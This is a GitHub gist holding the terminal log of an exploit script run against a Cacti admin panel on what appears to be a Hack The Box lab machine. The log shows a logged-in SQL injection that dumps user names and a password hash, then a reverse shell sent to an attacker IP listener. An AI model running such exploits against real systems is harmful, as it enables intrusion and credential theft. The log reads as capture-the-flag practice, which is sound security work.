-
-
Save oxtd/2bc5e16a7285d6d73930939fc51d12cf to your computer and use it in GitHub Desktop.
4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p <PASSWORD> --lhost 10.10.14.225 --lport 80 1 ⨯ | |
[+] Connecting to the server... | |
[+] Retrieving CSRF token... | |
[+] Got CSRF token: sid:4bf2475c0b3d453783fc1f9665153e363feb84b5,1631343319 | |
[+] Trying to log in... | |
[+] Successfully logged in! | |
[+] SQL Injection: | |
"name","hex" | |
"","" | |
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK" | |
"guest","43e9a4ab75570f5b" | |
[+] Check your nc listener! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment